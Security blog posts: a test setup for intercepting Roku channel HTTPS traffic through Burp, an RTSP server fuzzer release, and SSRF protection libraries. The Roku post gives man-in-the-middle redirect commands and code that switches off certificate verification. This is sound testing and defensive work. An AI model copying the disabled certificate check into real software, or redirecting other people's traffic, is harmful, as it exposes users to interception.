Brightscript code that makes HTTP requests uses Brightscript’s roUrlTransfer object. For example, some code to GET example.com might look like this:

urlTransfer = CreateObject("roUrlTransfer")
urlTransfer.SetCertificatesFile("common:/certs/ca-bundle.crt")
urlTransfer.SetUrl("https://example.com/")<br>s = urlTransfer.GetToString()

To setup an easy intercept environment I like to use the create_ap script from https://github.com/lakinduakash/linux-wifi-hotspot to quickly and easily configure hostapd, dnsmasq, and iptables to set up a NAT-ed test network hosted by a Linux machine. There are many ways to perform the man-in-the-middle to redirect requests to Burp, but I’m using a custom hosts file in the dnsmasq configuration to redirect connections to the domains I’m interested in (in this case example.com) to my local machine, and an iptables rule to redirect incoming connections on port 443 to Burp’s listening port.


Here’s starting the WIFI AP:

# cat /tmp/test-hosts<br>192.168.12.1 example.com
# create_ap -e /tmp/test-hosts $AP_NETWORK_INTERFACE $INTERNET_NETWORK_INTERFACE $SSID $PASSWORD

And here’s the iptables rule:

# iptables -t nat -A PREROUTING -p tcp --src 192.168.12.0/24 --dst 192.168.12.1 --dport 443 -j REDIRECT --to-port 8085

In Burp’s Proxy -> Options tab, I’ll add the proxy listener listening on the test network ip on port 8085, configured for invisible proxying mode:

https://i1.wp.com/1.bp.blogspot.com/-k6-BJdBuClo/YCGaPd4k0uI/AAAAAAAAARs/TNGXncPqBLoIjt7dqlqLQqvnUwzDO5zogCLcBGAsYHQ/s2884/burp1.png?w=1200&ssl=1

Next, we need to bypass the HTTPS certificate check that will cause the connection to fail. The easiest way to do this is to set EnablePeerVerification to false:

urlTransfer = CreateObject("roUrlTransfer")
urlTransfer.SetCertificatesFile("common:/certs/ca-bundle.crt")
urlTransfer.EnablePeerVerification(false)
urlTransfer.SetUrl("https://example.com/")
s = urlTransfer.GetToString()

Then, re-build the channel and sideload it on to a Roku device in developer mode. Alternatively we can export Burp’s CA certificate, convert it to PEM format, and include that in the modified channel.

This converts the cert from DER to PEM format:

$ openssl x509 -inform der -in burp-cert.der -out burp-cert.pem

The burp-cert.pem file needs to be added to the channel zip file, and the code below changes the certificates file from the internal Roku file to the burp pem file:

urlTransfer = CreateObject("roUrlTransfer")
urlTransfer.SetCertificatesFile("pkg:/burp-cert.pem")
urlTransfer.SetUrl("https://example.com/")
s = urlTransfer.GetToString()

It’s easy to add the certificate file to the package when exporting and sideloading using the BrightScript Eclipse plugin:

https://i2.wp.com/1.bp.blogspot.com/-KQUykpVEqIo/YCGajAySThI/AAAAAAAAAR0/9TmpYDKEH7U-X00uyl23AB8pMgxYzwUawCLcBGAsYHQ/s1877/export1.png?w=1200&ssl=1

Now the request can be proxied and shows up in Burp’s history:

https://i2.wp.com/1.bp.blogspot.com/-4nxRsQ9d_eI/YCGannkRoNI/AAAAAAAAAR4/KPQGUnI6hv8ZpFUBiJ9HvrdW0XPwVG_kwCLcBGAsYHQ/s2048/burp-history1.png?w=1200&ssl=1

With that you’re off to the races inspecting and modifying traffic of your Roku channel assessment subject. All of your usual fat client/android app techniques for intercepting and manipulating traffic applies. You can combine that with code review of the BrightScript itself to hunt for interesting security problems and don’t discount privacy problems like unencrypted transport or over collection of data.

For BrightScript developers who may be worried about people using these types of techniques here are our top five tips for coding secure and privacy conscious channels:

  1. Only deploy what you need in a channel, don’t deploy debug/test code.
  2. Consider that confidentiality of the file contents of your deployed channel may not be a given. Don’t hard code secret URLs, tokens, or other security relevant info in your channel or otherwise an attacker will not have access to the client-side code.
  3. Don’t gather/store/send more personal information than is absolutely necessary and expected by your users.
  4. Encrypt all of your network connections to/from your channel and verify certificates. Nothing should ever be in plain text HTTP.
  5. Watch out for 3rd parties. User tracking and other personal data sent to 3rd parties can be come compliance and legal nightmares, avoid this and make your business aware of the possible ramifications if they chose to use 3rd parties for tracking.

Hopefully this post has been useful as a quick start for those interested in exploring the security of Roku channels and Brightscript code. Compared to other similar platforms, Roku is relatively locked down with it’s own scripting language and sandboxing. They also don’t have much user controllable input or a notable client-side attack surface area, but channels on Roku and apps on other platforms generally have to connect to backend web services, so running those connections through Burp is a good starting point to look for security and privacy concerns.

Further research into the Roku platform itself is also on the horizon…perhaps there will be a Part 2 of this post? 🙂

The post New School Hacks: Test Setup for Hacking Roku Channels Written in Brightscript appeared first on Include Security Research Blog.

Announcing RTSPhuzz — An RTSP Server Fuzzer

15 June 2020 at 14:00

There are many ways software is tested for faults, some of those faults end up originating from exploitable memory corruption situations and are labeled vulnerabilities. One popular method used to identify these types of faults in software is runtime fuzzing.

When developing servers that implement an RFC defined protocol, dynamically mutating the inputs and messages sent to the server is a good strategy for fuzzing. The Mozilla security team has used fuzzing internally to great effect on their systems and applications over the years. One area that Mozilla wanted to see more open source work in was fuzzing of streaming media protocols, specifically RTSP.

Towards that goal IncludeSec is today releasing https://github.com/IncludeSecurity/RTSPhuzz. We’re also excited to announce the work of the initial development of the tool has been sponsored by the Mozilla Open Source Support (MOSS) awards program. RTSPhuzz is provided as free and open unsupported software for the greater good of the maintainers and authors of RTSP services — FOSS and COTS alike!

RTSPhuzz is based on the boofuzz framework, it and connects as a client to target RTSP servers and fuzzes RTSP messages or sequences of messages. In the rest of this post we’ll cover some of the important bits to know about it. If you have an RTSP server, go ahead and jump right into our repo and shoot us a note to say hi if it ends up being useful to you.

Existing Approaches

We are aware of two existing RTSP fuzzers, StreamFUZZ and RtspFuzzer.

RtspFuzzer uses the Peach fuzzing framework to fuzz RTSP responses, however it targets RTSP client implementations, whereas our fuzzer targets RTSP servers.

StreamFUZZ is a Python script that does not utilize a fuzzing framework. Similar to our fuzzer, it fuzzes different parts of RTSP messages and sends them to a server. However, it is more simplistic; it doesn’t fuzz as many messages or header fields as our fuzzer, it does not account for the types of the fields it fuzzes, and it does not keep track of sessions for fuzzing sequences of messages.

Approach to Fuzzer Creation

The general approach for RTSPhuzz was to first review the RTSP RFC carefully, then define each of the client-to-server message types as boofuzz messages. RTSP headers were then distributed among the boofuzz messages in such a way that each is mutated by the boofuzz engine in at least one message, and boofuzz messages are connected in a graph to reasonably simulate RTSP sessions. Header values and message bodies were given initial reasonable default values to allow successful fuzzing of later messages in a sequence of messages. Special processing is done for several headers so that they conform to the protocol when different parts of messages are being mutated. The boofuzz fuzzing framework gives us the advantage of being able to leverage its built-in mutations, logging, and web interface.

Using RTSPhuzz

You can grab the code from github. Then, specify the server host, server port, and RTSP path to a media file on the target server:

RTSPhuzz.py --host target.server.host --port 554 --path test/media/file.mp3

Once RTSPhuzz is started, the boofuzz framework will open the default web interface on localhost port 26000, and will record results locally in a boofuzz-results/ directory. The web interface can be re-opened for the database from a previous run with boofuzz’s boo tool:

boo open <run-*.db>

See the RTSPhuzz readme for more detailed options and ways to run RTSPhuzz, and boofuzz’s documentation for more information on boofuzz.

Open Source and Continued Development

This is RTSPhuzz’s initial release for open use by all. We encourage you to try it out and share ways to improve the tool. We will review and accept PRs, address bugs where we can, and also would love to hear any shout-outs for any bugs you find with this tool (@includesecurity).

The post Announcing RTSPhuzz — An RTSP Server Fuzzer appeared first on Include Security Research Blog.

Introducing: SafeURL – A set of SSRF Protection Libraries

At Include Security, we believe that a reactive approach to security can fall short when it’s not backed by proactive roots. We see new offensive tools for pen-testing and vulnerability analysis being created and released all the time. In regards to SSRF vulnerabilities, we saw an opportunity to release code for developers to assist in protecting against these sorts of security issues. So we’re releasing a new set of language specific libraries to help developers effectively protect against SSRF issues. In this blog post, we’ll introduce the concept of SafeURL; with details about how it works, as well as how developers can use it, and our plans for rewarding those who find vulnerabilities in it!

Preface: Server Side Request Forgery

Server Side Request Forgery (SSRF) is a vulnerability that gives an attacker the ability to create requests from a vulnerable server. SSRF attacks are commonly used to target not only the host server itself, but also hosts on the internal network that would normally be inaccessible due to firewalls.
SSRF allows an attacker to:

  • Scan and attack systems from the internal network that are not normally accessible
  • Enumerate and attack services that are running on these hosts
  • Exploit host-based authentication services

As is the case with many web application vulnerabilities, SSRF is possible because of a lack of user input validation. For example, a web application that accepts a URL input in order to go fetch that resource from the internet can be given a valid URL such as http://google.com
But the application may also accept URLs such as:

When those kinds of inputs are not validated, attackers are able to access internal resources that are not intended to be public.

Our Proposed Solution

SafeURL is a library, originally conceptualized as “SafeCURL” by Jack Whitton (aka @fin1te), that protects against SSRF by validating each part of the URL against a white or black list before making the request. SafeURL can also be used to validate URLs. SafeURL intends to be a simple replacement for libcurl methods in PHP and Python as well as java.net.URLConnection in Scala.
The source for the libraries are available on our Github:

  1. SafeURL for PHP – Primarily developed by @fin1te
  2. SafeURL for Python – Ported by @nicolasrod
  3. SafeURL for Scala – Ported by @saelo

Other Mitigation Techniques

Our approach is focused on protection on the application layer. Other techniques used by some Silicon Valley companies to combat SSRF include:

  • Setting up wrappers for HTTP client calls which are forwarded to a single-purposed proxy that prevents it from talking to any internal hosts based on firewall rules as the HTTP requests are proxied
  • At the application server layer, hijack all socket connections to ensure they meet a developer configured policy by enforcing iptables rules or more advanced interactions with the app server’s networking layer

Installation

PHP

SafeURL can be included in any PHP project by cloning the repository on our Github and importing it into your project.

Python

SafeURL can be used in Python apps by cloning the repository on our Github and importing it like this:

from safeurl import safeurl

Scala

To use SafeURL in Scala applications, clone the repository and store in the app/ folder of your Play application and import it.

import com.includesecurity.safeurl._

Usage

PHP

SafeURL is designed to be a drop-in replacement for the curl_exec() function in PHP. It can simply be replaced with SafeURL::execute() wrapped in a try {} catch {} block.

try {
    $url = "http://www.google.com";

    $curlHandle = curl_init();
    //Your usual cURL options
    curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (SafeURL)");

    //Execute using SafeURL
    $response = SafeURL::execute($url, $curlHandle);
} catch (Exception $e) {
    //URL wasn"t safe
}

Options such as white and black lists can be modified. For example:

$options = new Options();
$options->addToList("blacklist", "domain", "(.*)\.fin1te\.net");
$options->addToList("whitelist", "scheme", "ftp");

//This will now throw an InvalidDomainException
$response = SafeURL::execute("http://example.com", $curlHandle, $options);

//Whilst this will be allowed, and return the response
$response = SafeURL::execute("ftp://example.com", $curlHandle, $options);

Python

SafeURL serves as a replacement for PyCurl in Python.

try:
  su = safeurl.SafeURL()
  res = su.execute("https://example.com";)
except:
  print "Unexpected error:", sys.exc_info()

Example of modifying options:

try:
    sc = safeurl.SafeURL()

    opt = safeurl.Options()
    opt.clearList("whitelist")
    opt.clearList("blacklist")
    opt.setList("whitelist", [ 
    "google.com" , "youtube.com"], "domain")

    su.setOptions(opt)
    res = su.execute("http://www.youtube.com")
except:
    print "Unexpected error:", sys.exc_info()

Scala

SafeURL replaces the JVM Class URLConnection that is normally used in Scala.

try {
  val resp = SafeURL.fetch("http://google.com")
  val r = Await.result(resp, 500 millis)
} catch {
  //URL wasnt safe

Options:

SafeURL.defaultConfiguration.lists.ip.blacklist ::= "12.34.0.0/16"
SafeURL.defaultConfiguration.lists.domain.blacklist ::= "example.com"

Demo, Bug Bounty Contest, and Further Contributions

An important question to ask is: Is SafeURL really safe? Don’t take our word for it. Try to hack it yourself! We’re hosting live demo apps in each language for anyone to try and bypass SafeURL and perform a successful SSRF attack. On each site there is a file called key.txt on the server’s local filesystem with the following .htaccess policy:

<Files key.txt>
Order deny,allow
Deny from allow
Allow from 127.0.0.1

ErrorDocument 403 /oops.html
</Files>

If you can read the contents of the file through a flaw in SafeURL and tell us how you did it (patch plz?), we will contact you about your reward. As a thank you to the community, we’re going to reward up to one Bitcoin for any security issues. If you find a non-security bug in the source of any of our libraries, please contact us as well you’ll have our thanks and a shout-out.
The challenges are being hosted at the following URLs:
PHP: safeurl-php.excludesecurity.com
Python: safeurl-python.excludesecurity.com
Scala: safeurl-scala.excludesecurity.com

If you can contribute a Pull Request and port the SafeURL concept to other languages (such as Java, Ruby, C#, etc.) we could throw you you some Bitcoin as a thank you.

Good luck and thanks for helping us improve SafeURL!

The post Introducing: SafeURL – A set of SSRF Protection Libraries appeared first on Include Security Research Blog.

❌
❌